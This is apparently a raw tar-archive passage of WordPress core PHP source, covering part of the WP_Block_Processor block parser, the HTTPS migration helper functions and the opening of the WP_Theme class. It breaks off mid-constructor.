* Use this function to extract some blocks within a document, but not all. For example,
* one might want to find image galleries, parse them, modify them, and then reserialize
* them in place.
*
* Once this function returns, the parser will be matched on token following the close
* of the given block.
*
* The return type of this method is compatible with the return of {@see \parse_blocks()}.
*
* Example:
*
* $processor = new WP_Block_Processor( $post_content );
* if ( ! $processor->next_block( 'gallery' ) ) {
* return $post_content;
* }
*
* $gallery_at = $processor->get_span()->start;
* $gallery = $processor->extract_full_block_and_advance();
* $ends_before = $processor->get_span();
* $ends_before = $ends_before->start ?? strlen( $post_content );
*
* $new_gallery = update_gallery( $gallery );
* $new_gallery = serialize_block( $new_gallery );
*
* return (
* substr( $post_content, 0, $gallery_at ) .
* $new_gallery .
* substr( $post_content, $ends_before )
* );
*
* @since 6.9.0
*
* @return array[]|null {
* Array of block structures.
*
* @type array ...$0 {
* An associative array of a single parsed block object. See WP_Block_Parser_Block.
*
* @type string|null $blockName Name of block.
* @type array $attrs Attributes from block comment delimiters.
* @type array[] $innerBlocks List of inner blocks. An array of arrays that
* have the same structure as this one.
* @type string $innerHTML HTML from inside block comment delimiters.
* @type array $innerContent List of string fragments and null markers where
* inner blocks were found.
* }
* }
*/
public function extract_full_block_and_advance(): ?array {
if ( $this->is_html() ) {
$chunk = $this->get_html_content();
return array(
'blockName' => null,
'attrs' => array(),
'innerBlocks' => array(),
'innerHTML' => $chunk,
'innerContent' => array( $chunk ),
);
}
$block = array(
'blockName' => $this->get_block_type(),
'attrs' => $this->allocate_and_return_parsed_attributes() ?? array(),
'innerBlocks' => array(),
'innerHTML' => '',
'innerContent' => array(),
);
$depth = $this->get_depth();
while ( $this->next_token() && $this->get_depth() > $depth ) {
if ( $this->is_html() ) {
$chunk = $this->get_html_content();
$block['innerHTML'] .= $chunk;
$block['innerContent'][] = $chunk;
continue;
}
/**
* Inner blocks.
*
* @todo This is a decent place to call {@link \render_block()}
* @todo Use iteration instead of recursion, or at least refactor to tail-call form.
*/
if ( $this->opens_block() ) {
$inner_block = $this->extract_full_block_and_advance();
$block['innerBlocks'][] = $inner_block;
$block['innerContent'][] = null;
}
/*
* Because the parser has advanced past the closing block token, it
* may be matched on an HTML span. This needs to be processed before
* moving on to the next token at the start of the next loop iteration.
*/
if ( $this->is_html() ) {
$chunk = $this->get_html_content();
$block['innerHTML'] .= $chunk;
$block['innerContent'][] = $chunk;
}
}
return $block;
}
/**
* Returns the byte-offset after the ending character of an HTML comment,
* assuming the proper starting byte offset.
*
* @since 6.9.0
*
* @param int $comment_starting_at Where the HTML comment started, the leading `<`.
* @param int $search_end Last offset in which to search, for limiting search span.
* @return int Offset after the current HTML comment ends, or `$search_end` if no end was found.
*/
private function find_html_comment_end( int $comment_starting_at, int $search_end ): int {
$text = $this->source_text;
// Find span-of-dashes comments which look like `<!----->`.
$span_of_dashes = strspn( $text, '-', $comment_starting_at + 2 );
if (
$comment_starting_at + 2 + $span_of_dashes < $search_end &&
'>' === $text[ $comment_starting_at + 2 + $span_of_dashes ]
) {
return $comment_starting_at + $span_of_dashes + 1;
}
// Otherwise, there are other characters inside the comment, find the first `-->` or `--!>`.
$now_at = $comment_starting_at + 4;
while ( $now_at < $search_end ) {
$dashes_at = strpos( $text, '--', $now_at );
if ( false === $dashes_at ) {
return $search_end;
}
$closer_must_be_at = $dashes_at + 2 + strspn( $text, '-', $dashes_at + 2 );
if ( $closer_must_be_at < $search_end && '!' === $text[ $closer_must_be_at ] ) {
++$closer_must_be_at;
}
if ( $closer_must_be_at < $search_end && '>' === $text[ $closer_must_be_at ] ) {
return $closer_must_be_at + 1;
}
++$now_at;
}
return $search_end;
}
/**
* Indicates if the last attempt to parse a block comment delimiter
* failed, if set, otherwise `null` if the last attempt succeeded.
*
* @since 6.9.0
*
* @return string|null Error from last attempt at parsing next block delimiter,
* or `null` if last attempt succeeded.
*/
public function get_last_error(): ?string {
return $this->last_error;
}
/**
* Indicates if the last attempt to parse a block’s JSON attributes failed.
*
* @see \json_last_error()
*
* @since 6.9.0
*
* @return int JSON_ERROR_ code from last attempt to parse block JSON attributes.
*/
public function get_last_json_error(): int {
return $this->last_json_error;
}
/**
* Returns the type of the block comment delimiter.
*
* One of:
*
* - {@see self::OPENER}
* - {@see self::CLOSER}
* - {@see self::VOID}
* - `null`
*
* @since 6.9.0
*
* @return string|null type of the block comment delimiter, if currently matched.
*/
public function get_delimiter_type(): ?string {
switch ( $this->state ) {
case self::HTML_SPAN:
return self::VOID;
case self::MATCHED:
return $this->type;
default:
return null;
}
}
/**
* Returns whether the delimiter contains the closing flag.
*
* This should be avoided except in cases of custom error-handling
* with block closers containing the void flag. For normative use,
* {@see self::get_delimiter_type()}.
*
* @since 6.9.0
*
* @return bool Whether the currently-matched block delimiter contains the closing flag.
*/
public function has_closing_flag(): bool {
return $this->has_closing_flag;
}
/**
* Indicates if the block delimiter represents a block of the given type.
*
* Since the “core” namespace may be implicit, it’s allowable to pass
* either the fully-qualified block type with namespace and block name
* as well as the shorthand version only containing the block name, if
* the desired block is in the “core” namespace.
*
* Since freeform HTML content is non-block content, it has no block type.
* Passing the wildcard “*” will, however, return true for all block types,
* even the implicit freeform content, though not for spans of inner HTML.
*
* Example:
*
* $is_core_paragraph = $processor->is_block_type( 'paragraph' );
* $is_core_paragraph = $processor->is_block_type( 'core/paragraph' );
* $is_formula = $processor->is_block_type( 'math-block/formula' );
*
* @param string $block_type Block type name for the desired block.
* E.g. "paragraph", "core/paragraph", "math-blocks/formula".
* @return bool Whether this delimiter represents a block of the given type.
*/
public function is_block_type( string $block_type ): bool {
if ( '*' === $block_type ) {
return true;
}
if ( $this->is_html() ) {
// This is a core/freeform text block, it’s special.
if ( 0 === ( $this->open_blocks_length[0] ?? null ) ) {
return (
'core/freeform' === $block_type ||
'freeform' === $block_type
);
}
// Otherwise this is innerHTML and not a block.
return false;
}
return $this->are_equal_block_types( $this->source_text, $this->namespace_at, $this->name_at - $this->namespace_at + $this->name_length, $block_type, 0, strlen( $block_type ) );
}
/**
* Given two spans of text, indicate if they represent identical block types.
*
* This function normalizes block types to account for implicit core namespacing.
*
* Note! This function only returns valid results when the complete block types are
* represented in the span offsets and lengths. This means that the full optional
* namespace and block name must be represented in the input arguments.
*
* Example:
*
* 0 5 10 15 20 25 30 35 40
* $text = '<!-- wp:block --><!-- /wp:core/block -->';
*
* true === WP_Block_Processor::are_equal_block_types( $text, 9, 5, $text, 27, 10 );
* false === WP_Block_Processor::are_equal_block_types( $text, 9, 5, 'my/block', 0, 8 );
*
* @since 6.9.0
*
* @param string $a_text Text in which first block type appears.
* @param int $a_at Byte offset into text in which first block type starts.
* @param int $a_length Byte length of first block type.
* @param string $b_text Text in which second block type appears (may be the same as the first text).
* @param int $b_at Byte offset into text in which second block type starts.
* @param int $b_length Byte length of second block type.
* @return bool Whether the spans of text represent identical block types, normalized for namespacing.
*/
public static function are_equal_block_types( string $a_text, int $a_at, int $a_length, string $b_text, int $b_at, int $b_length ): bool {
$a_ns_length = strcspn( $a_text, '/', $a_at, $a_length );
$b_ns_length = strcspn( $b_text, '/', $b_at, $b_length );
$a_has_ns = $a_ns_length !== $a_length;
$b_has_ns = $b_ns_length !== $b_length;
// Both contain namespaces.
if ( $a_has_ns && $b_has_ns ) {
if ( $a_length !== $b_length ) {
return false;
}
$a_block_type = substr( $a_text, $a_at, $a_length );
return 0 === substr_compare( $b_text, $a_block_type, $b_at, $b_length );
}
if ( $a_has_ns ) {
$b_block_type = 'core/' . substr( $b_text, $b_at, $b_length );
return (
strlen( $b_block_type ) === $a_length &&
0 === substr_compare( $a_text, $b_block_type, $a_at, $a_length )
);
}
if ( $b_has_ns ) {
$a_block_type = 'core/' . substr( $a_text, $a_at, $a_length );
return (
strlen( $a_block_type ) === $b_length &&
0 === substr_compare( $b_text, $a_block_type, $b_at, $b_length )
);
}
// Neither contains a namespace.
if ( $a_length !== $b_length ) {
return false;
}
$a_name = substr( $a_text, $a_at, $a_length );
return 0 === substr_compare( $b_text, $a_name, $b_at, $b_length );
}
/**
* Indicates if the matched delimiter is an opening or void delimiter of the given type,
* if a type is provided, otherwise if it opens any block or implicit freeform HTML content.
*
* This is a helper method to ease handling of code inspecting where blocks start, and for
* checking if the blocks are of a given type. The function is variadic to allow for
* checking if the delimiter opens one of many possible block types.
*
* To advance to the start of a block {@see self::next_block()}.
*
* Example:
*
* $processor = new WP_Block_Processor( $html );
* while ( $processor->next_delimiter() ) {
* if ( $processor->opens_block( 'core/code', 'syntaxhighlighter/code' ) ) {
* echo "Found code!";
* continue;
* }
*
* if ( $processor->opens_block( 'core/image' ) ) {
* echo "Found an image!";
* continue;
* }
*
* if ( $processor->opens_block() ) {
* echo "Found a new block!";
* }
* }
*
* @since 6.9.0
*
* @see self::is_block_type()
*
* @param string[] $block_type Optional. Is the matched block type one of these?
* If none are provided, will not test block type.
* @return bool Whether the matched block delimiter opens a block, and whether it
* opens a block of one of the given block types, if provided.
*/
public function opens_block( string ...$block_type ): bool {
// HTML spans only open implicit freeform content at the top level.
if ( self::HTML_SPAN === $this->state && 1 !== count( $this->open_blocks_at ) ) {
return false;
}
/*
* Because HTML spans are discovered after the next delimiter is found,
* the delimiter type when visiting HTML spans refers to the type of the
* following delimiter. Therefore the HTML case is handled by checking
* the state and depth of the stack of open block.
*/
if ( self::CLOSER === $this->type && ! $this->is_html() ) {
return false;
}
if ( count( $block_type ) === 0 ) {
return true;
}
foreach ( $block_type as $block ) {
if ( $this->is_block_type( $block ) ) {
return true;
}
}
return false;
}
/**
* Indicates if the matched delimiter is an HTML span.
*
* @since 6.9.0
*
* @see self::is_non_whitespace_html()
*
* @return bool Whether the processor is matched on an HTML span.
*/
public function is_html(): bool {
return self::HTML_SPAN === $this->state;
}
/**
* Indicates if the matched delimiter is an HTML span and comprises more
* than whitespace characters, i.e. contains real content.
*
* Many block serializers introduce newlines between block delimiters,
* so the presence of top-level non-block content does not imply that
* there are “real” freeform HTML blocks. Checking if there is content
* beyond whitespace is a more certain check, such as for determining
* whether to load CSS for the freeform or fallback block type.
*
* @since 6.9.0
*
* @see self::is_html()
*
* @return bool Whether the currently-matched delimiter is an HTML
* span containing non-whitespace text.
*/
public function is_non_whitespace_html(): bool {
if ( ! $this->is_html() ) {
return false;
}
$length = $this->matched_delimiter_at - $this->after_previous_delimiter;
$whitespace_length = strspn(
$this->source_text,
" \t\f\r\n",
$this->after_previous_delimiter,
$length
);
return $whitespace_length !== $length;
}
/**
* Returns the string content of a matched HTML span, or `null` otherwise.
*
* @since 6.9.0
*
* @return string|null Raw HTML content, or `null` if not currently matched on HTML.
*/
public function get_html_content(): ?string {
if ( ! $this->is_html() ) {
return null;
}
return substr(
$this->source_text,
$this->after_previous_delimiter,
$this->matched_delimiter_at - $this->after_previous_delimiter
);
}
/**
* Allocates a substring for the block type and returns the fully-qualified
* name, including the namespace, if matched on a delimiter, otherwise `null`.
*
* This function is like {@see self::get_printable_block_type()} but when
* paused on a freeform HTML block, will return `null` instead of “core/freeform”.
* The `null` behavior matches what {@see \parse_blocks()} returns but may not
* be as useful as having a string value.
*
* This function allocates a substring for the given block type. This
* allocation will be small and likely fine in most cases, but it's
* preferable to call {@see self::is_block_type()} if only needing
* to know whether the delimiter is for a given block type, as that
* function is more efficient for this purpose and avoids the allocation.
*
* Example:
*
* // Avoid.
* 'core/paragraph' = $processor->get_block_type();
*
* // Prefer.
* $processor->is_block_type( 'core/paragraph' );
* $processor->is_block_type( 'paragraph' );
* $processor->is_block_type( 'core/freeform' );
*
* // Freeform HTML content has no block type.
* $processor = new WP_Block_Processor( 'non-block content' );
* $processor->next_token();
* null === $processor->get_block_type();
*
* @since 6.9.0
*
* @see self::are_equal_block_types()
*
* @return string|null Fully-qualified block namespace and type, e.g. "core/paragraph",
* if matched on an explicit delimiter, otherwise `null`.
*/
public function get_block_type(): ?string {
if (
self::READY === $this->state ||
self::COMPLETE === $this->state ||
self::INCOMPLETE_INPUT === $this->state
) {
return null;
}
// This is a core/freeform text block, it’s special.
if ( $this->is_html() ) {
return null;
}
$block_type = substr( $this->source_text, $this->namespace_at, $this->name_at - $this->namespace_at + $this->name_length );
return self::normalize_block_type( $block_type );
}
/**
* Allocates a printable substring for the block type and returns the fully-qualified
* name, including the namespace, if matched on a delimiter or freeform block, otherwise `null`.
*
* This function is like {@see self::get_block_type()} but when paused on a freeform
* HTML block, will return “core/freeform” instead of `null`. The `null` behavior matches
* what {@see \parse_blocks()} returns but may not be as useful as having a string value.
*
* This function allocates a substring for the given block type. This
* allocation will be small and likely fine in most cases, but it's
* preferable to call {@see self::is_block_type()} if only needing
* to know whether the delimiter is for a given block type, as that
* function is more efficient for this purpose and avoids the allocation.
*
* Example:
*
* // Avoid.
* 'core/paragraph' = $processor->get_printable_block_type();
*
* // Prefer.
* $processor->is_block_type( 'core/paragraph' );
* $processor->is_block_type( 'paragraph' );
* $processor->is_block_type( 'core/freeform' );
*
* // Freeform HTML content is given an implicit type.
* $processor = new WP_Block_Processor( 'non-block content' );
* $processor->next_token();
* 'core/freeform' === $processor->get_printable_block_type();
*
* @since 6.9.0
*
* @see self::are_equal_block_types()
*
* @return string|null Fully-qualified block namespace and type, e.g. "core/paragraph",
* if matched on an explicit delimiter or freeform block, otherwise `null`.
*/
public function get_printable_block_type(): ?string {
if (
self::READY === $this->state ||
self::COMPLETE === $this->state ||
self::INCOMPLETE_INPUT === $this->state
) {
return null;
}
// This is a core/freeform text block, it’s special.
if ( $this->is_html() ) {
return 1 === count( $this->open_blocks_at )
? 'core/freeform'
: '#innerHTML';
}
$block_type = substr( $this->source_text, $this->namespace_at, $this->name_at - $this->namespace_at + $this->name_length );
return self::normalize_block_type( $block_type );
}
/**
* Normalizes a block name to ensure that missing implicit “core” namespaces are present.
*
* Example:
*
* 'core/paragraph' === WP_Block_Processor::normalize_block_byte( 'paragraph' );
* 'core/paragraph' === WP_Block_Processor::normalize_block_byte( 'core/paragraph' );
* 'my/paragraph' === WP_Block_Processor::normalize_block_byte( 'my/paragraph' );
*
* @since 6.9.0
*
* @param string $block_type Valid block name, potentially without a namespace.
* @return string Fully-qualified block type including namespace.
*/
public static function normalize_block_type( string $block_type ): string {
return false === strpos( $block_type, '/' )
? "core/{$block_type}"
: $block_type;
}
/**
* Returns a lazy wrapper around the block attributes, which can be used
* for efficiently interacting with the JSON attributes.
*
* This stub hints that there should be a lazy interface for parsing
* block attributes but doesn’t define it. It serves both as a placeholder
* for one to come as well as a guard against implementing an eager
* function in its place.
*
* @throws Exception This function is a stub for subclasses to implement
* when providing streaming attribute parsing.
*
* @since 6.9.0
*
* @see self::allocate_and_return_parsed_attributes()
*
* @return never
*/
public function get_attributes() {
throw new Exception( 'Lazy attribute parsing not yet supported' );
}
/**
* Attempts to parse and return the entire JSON attributes from the delimiter,
* allocating memory and processing the JSON span in the process.
*
* This does not return any parsed attributes for a closing block delimiter
* even if there is a span of JSON content; this JSON is a parsing error.
*
* Consider calling {@see static::get_attributes()} instead if it's not
* necessary to read all the attributes at the same time, as that provides
* a more efficient mechanism for typical use cases.
*
* Since the JSON span inside the comment delimiter may not be valid JSON,
* this function will return `null` if it cannot parse the span and set the
* {@see static::get_last_json_error()} to the appropriate JSON_ERROR_ constant.
*
* If the delimiter contains no JSON span, it will also return `null`,
* but the last error will be set to {@see \JSON_ERROR_NONE}.
*
* Example:
*
* $processor = new WP_Block_Processor( '<!-- wp:image {"url": "https://wordpress.org/favicon.ico"} -->' );
* $processor->next_delimiter();
* $memory_hungry_and_slow_attributes = $processor->allocate_and_return_parsed_attributes();
* $memory_hungry_and_slow_attributes === array( 'url' => 'https://wordpress.org/favicon.ico' );
*
* $processor = new WP_Block_Processor( '<!-- /wp:image {"url": "https://wordpress.org/favicon.ico"} -->' );
* $processor->next_delimiter();
* null = $processor->allocate_and_return_parsed_attributes();
* JSON_ERROR_NONE = $processor->get_last_json_error();
*
* $processor = new WP_Block_Processor( '<!-- wp:separator {} /-->' );
* $processor->next_delimiter();
* array() === $processor->allocate_and_return_parsed_attributes();
*
* $processor = new WP_Block_Processor( '<!-- wp:separator /-->' );
* $processor->next_delimiter();
* null = $processor->allocate_and_return_parsed_attributes();
*
* $processor = new WP_Block_Processor( '<!-- wp:image {"url} -->' );
* $processor->next_delimiter();
* null = $processor->allocate_and_return_parsed_attributes();
* JSON_ERROR_CTRL_CHAR = $processor->get_last_json_error();
*
* @since 6.9.0
*
* @return array|null Parsed JSON attributes, if present and valid, otherwise `null`.
*/
public function allocate_and_return_parsed_attributes(): ?array {
$this->last_json_error = JSON_ERROR_NONE;
if ( self::CLOSER === $this->type || $this->is_html() || 0 === $this->json_length ) {
return null;
}
$json_span = substr( $this->source_text, $this->json_at, $this->json_length );
$parsed = json_decode( $json_span, null, 512, JSON_OBJECT_AS_ARRAY | JSON_INVALID_UTF8_SUBSTITUTE );
$last_error = json_last_error();
$this->last_json_error = $last_error;
return ( JSON_ERROR_NONE === $last_error && is_array( $parsed ) )
? $parsed
: null;
}
/**
* Returns the span representing the currently-matched delimiter, if matched, otherwise `null`.
*
* Example:
*
* $processor = new WP_Block_Processor( '<!-- wp:void /-->' );
* null === $processor->get_span();
*
* $processor->next_delimiter();
* WP_HTML_Span( 0, 17 ) === $processor->get_span();
*
* @since 6.9.0
*
* @return WP_HTML_Span|null Span of text in source text spanning matched delimiter.
*/
public function get_span(): ?WP_HTML_Span {
switch ( $this->state ) {
case self::HTML_SPAN:
return new WP_HTML_Span( $this->after_previous_delimiter, $this->matched_delimiter_at - $this->after_previous_delimiter );
case self::MATCHED:
return new WP_HTML_Span( $this->matched_delimiter_at, $this->matched_delimiter_length );
default:
return null;
}
}
//
// Constant declarations that would otherwise pollute the top of the class.
//
/**
* Indicates that the block comment delimiter closes an open block.
*
* @see self::$type
*
* @since 6.9.0
*/
const CLOSER = 'closer';
/**
* Indicates that the block comment delimiter opens a block.
*
* @see self::$type
*
* @since 6.9.0
*/
const OPENER = 'opener';
/**
* Indicates that the block comment delimiter represents a void block
* with no inner content of any kind.
*
* @see self::$type
*
* @since 6.9.0
*/
const VOID = 'void';
/**
* Indicates that the processor is ready to start parsing but hasn’t yet begun.
*
* @see self::$state
*
* @since 6.9.0
*/
const READY = 'processor-ready';
/**
* Indicates that the processor is matched on an explicit block delimiter.
*
* @see self::$state
*
* @since 6.9.0
*/
const MATCHED = 'processor-matched';
/**
* Indicates that the processor is matched on the opening of an implicit freeform delimiter.
*
* @see self::$state
*
* @since 6.9.0
*/
const HTML_SPAN = 'processor-html-span';
/**
* Indicates that the parser started parsing a block comment delimiter, but
* the input document ended before it could finish. The document was likely truncated.
*
* @see self::$state
*
* @since 6.9.0
*/
const INCOMPLETE_INPUT = 'incomplete-input';
/**
* Indicates that the processor has finished parsing and has nothing left to scan.
*
* @see self::$state
*
* @since 6.9.0
*/
const COMPLETE = 'processor-complete';
}
https-migration-20260606102945.php 0000666 00000011205 15224151220 0011773 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-theme.php 0000666 00000200422 15224151220 0010104 0 ustar 00 <?php
/**
* WP_Theme Class
*
* @package WordPress
* @subpackage Theme
* @since 3.4.0
*/
#[AllowDynamicProperties]
final class WP_Theme implements ArrayAccess {
/**
* Whether the theme has been marked as updateable.
*
* @since 4.4.0
* @var bool
*
* @see WP_MS_Themes_List_Table
*/
public $update = false;
/**
* Headers for style.css files.
*
* @since 3.4.0
* @since 5.4.0 Added `Requires at least` and `Requires PHP` headers.
* @since 6.1.0 Added `Update URI` header.
* @var string[]
*/
private static $file_headers = array(
'Name' => 'Theme Name',
'ThemeURI' => 'Theme URI',
'Description' => 'Description',
'Author' => 'Author',
'AuthorURI' => 'Author URI',
'Version' => 'Version',
'Template' => 'Template',
'Status' => 'Status',
'Tags' => 'Tags',
'TextDomain' => 'Text Domain',
'DomainPath' => 'Domain Path',
'RequiresWP' => 'Requires at least',
'RequiresPHP' => 'Requires PHP',
'UpdateURI' => 'Update URI',
);
/**
* Default themes.
*
* @since 3.4.0
* @since 3.5.0 Added the Twenty Twelve theme.
* @since 3.6.0 Added the Twenty Thirteen theme.
* @since 3.8.0 Added the Twenty Fourteen theme.
* @since 4.1.0 Added the Twenty Fifteen theme.
* @since 4.4.0 Added the Twenty Sixteen theme.
* @since 4.7.0 Added the Twenty Seventeen theme.
* @since 5.0.0 Added the Twenty Nineteen theme.
* @since 5.3.0 Added the Twenty Twenty theme.
* @since 5.6.0 Added the Twenty Twenty-One theme.
* @since 5.9.0 Added the Twenty Twenty-Two theme.
* @since 6.1.0 Added the Twenty Twenty-Three theme.
* @since 6.4.0 Added the Twenty Twenty-Four theme.
* @since 6.7.0 Added the Twenty Twenty-Five theme.
* @var string[]
*/
private static $default_themes = array(
'classic' => 'WordPress Classic',
'default' => 'WordPress Default',
'twentyten' => 'Twenty Ten',
'twentyeleven' => 'Twenty Eleven',
'twentytwelve' => 'Twenty Twelve',
'twentythirteen' => 'Twenty Thirteen',
'twentyfourteen' => 'Twenty Fourteen',
'twentyfifteen' => 'Twenty Fifteen',
'twentysixteen' => 'Twenty Sixteen',
'twentyseventeen' => 'Twenty Seventeen',
'twentynineteen' => 'Twenty Nineteen',
'twentytwenty' => 'Twenty Twenty',
'twentytwentyone' => 'Twenty Twenty-One',
'twentytwentytwo' => 'Twenty Twenty-Two',
'twentytwentythree' => 'Twenty Twenty-Three',
'twentytwentyfour' => 'Twenty Twenty-Four',
'twentytwentyfive' => 'Twenty Twenty-Five',
);
/**
* Renamed theme tags.
*
* @since 3.8.0
* @var string[]
*/
private static $tag_map = array(
'fixed-width' => 'fixed-layout',
'flexible-width' => 'fluid-layout',
);
/**
* Absolute path to the theme root, usually wp-content/themes
*
* @since 3.4.0
* @var string
*/
private $theme_root;
/**
* Header data from the theme's style.css file.
*
* @since 3.4.0
* @var array
*/
private $headers = array();
/**
* Header data from the theme's style.css file after being sanitized.
*
* @since 3.4.0
* @var array
*/
private $headers_sanitized;
/**
* Is this theme a block theme.
*
* @since 6.2.0
* @var bool
*/
private $block_theme;
/**
* Header name from the theme's style.css after being translated.
*
* Cached due to sorting functions running over the translated name.
*
* @since 3.4.0
* @var string
*/
private $name_translated;
/**
* Errors encountered when initializing the theme.
*
* @since 3.4.0
* @var WP_Error
*/
private $errors;
/**
* The directory name of the theme's files, inside the theme root.
*
* In the case of a child theme, this is directory name of the child theme.
* Otherwise, 'stylesheet' is the same as 'template'.
*
* @since 3.4.0
* @var string
*/
private $stylesheet;
/**
* The directory name of the theme's files, inside the theme root.
*
* In the case of a child theme, this is the directory name of the parent theme.
* Otherwise, 'template' is the same as 'stylesheet'.
*
* @since 3.4.0
* @var string
*/
private $template;
/**
* A reference to the parent theme, in the case of a child theme.
*
* @since 3.4.0
* @var WP_Theme
*/
private $parent;
/**
* URL to the theme root, usually an absolute URL to wp-content/themes
*
* @since 3.4.0
* @var string
*/
private $theme_root_uri;
/**
* Flag for whether the theme's textdomain is loaded.
*
* @since 3.4.0
* @var bool
*/
private $textdomain_loaded;
/**
* Stores an md5 hash of the theme root, to function as the cache key.
*
* @since 3.4.0
* @var string
*/
private $cache_hash;
/**
* Block template folders.
*
* @since 6.4.0
* @var string[]
*/
private $block_template_folders;
/**
* Default values for template folders.
*
* @since 6.4.0
* @var string[]
*/
private $default_template_folders = array(
'wp_template' => 'templates',
'wp_template_part' => 'parts',
);
/**
* Flag for whether the themes cache bucket should be persistently cached.
*
* Default is false. Can be set with the {@see 'wp_cache_themes_persistently'} filter.
*
* @since 3.4.0
* @var bool
*/
private static $persistently_cache;
/**
* Expiration time for the themes cache bucket.
*
* By default the bucket is not cached, so this value is useless.
*
* @since 3.4.0
* @var bool
*/
private static $cache_expiration = 1800;
/**
* Constructor for WP_Theme.
*
* @since 3.4.0
*
* @global string[] $wp_theme_directories
*
* @param string $theme_dir Directory of the theme within the theme_root.
* @param string $theme_root Theme root.
* @param WP_Theme|null $_child If this theme is a parent theme, the child may be passed for validation purposes.
*/
public function __construct( $theme_dir, $theme_root, $_child = null ) {
global $wp_theme_directories;
// Initialize caching on first run.
if ( ! isset( self::$persistently_cache ) ) {
/** This action is documented in wp-includes/theme.php */
self::$persistently_cache = apply_filters( 'wp_cache_themes_persistently', false, 'WP_Theme' );
if ( self::$persistently_cache ) {
wp_cache_add_global_groups( 'themes' );
if ( is_int( self::$persistently_cache ) ) {
self::$cache_expiration = self::$persistently_cache;
}
} else {
wp_cache_add_non_persistent_groups( 'themes' );
}
}
// Handle a numeric theme directory as a string.
$theme_dir = (string) $theme_dir;
$this->theme_root = $theme_root;
$this->stylesheet = $theme_dir;
// Correct a situation where the theme is 'some-directory/some-theme' but 'some-directory' was passed in as part of the theme root instead.
if ( ! in_array( $theme_root, (array) $wp_theme_directories, true )
&& in_array( dirname( $theme_root ), (array) $wp_theme_directories, true )
) {
$this->stylesheet = basename( $this->theme_root ) . '/' . $this->stylesheet;
$this->theme_root = dirname( $theme_root );
}
$this->cache_hash = md5( $this->theme_root . '/' . $this->stylesheet );
$theme_file = $this->stylesheet . '/style.css';
$cache = $this->cache_get( 'theme' );
if ( is_array( $cache ) ) {
foreach ( array( 'block_template_folders', 'block_theme', 'errors', 'headers', 'template' ) as $key ) {
if ( isset( $cache[ $key ] ) ) {
$this->$key = $cache[ $key ];
}
}
if ( $this->errors ) {
return;
}
if ( isset( $cache['theme_root_template'] ) ) {
$theme_root_template = $cache['theme_root_template'];
}
} elseif ( ! file_exists( $this->theme_root . '/' . $theme_file ) ) {
$this->headers['Name'] = $this->stylesheet;
if ( ! file_exists( $this->theme_root . '/' . $this->stylesheet ) ) {
$this->errors = new WP_Error(
'theme_not_found',
sprintf(
/* translators: %s: Theme directory name. */
__( 'The theme directory "%s" does not exist.' ),
esc_html( $this->stylesheet )
)
);
} else {
$this->errors = new WP_Error( 'theme_no_stylesheet', __( 'Stylesheet is missing.' ) );
}
$this->template = $this->stylesheet;
$this->block_theme = false;
$this->block_template_folders = $this->default_template_folders;
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->block_template_folders,
'block_theme' => $this->block_theme,
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
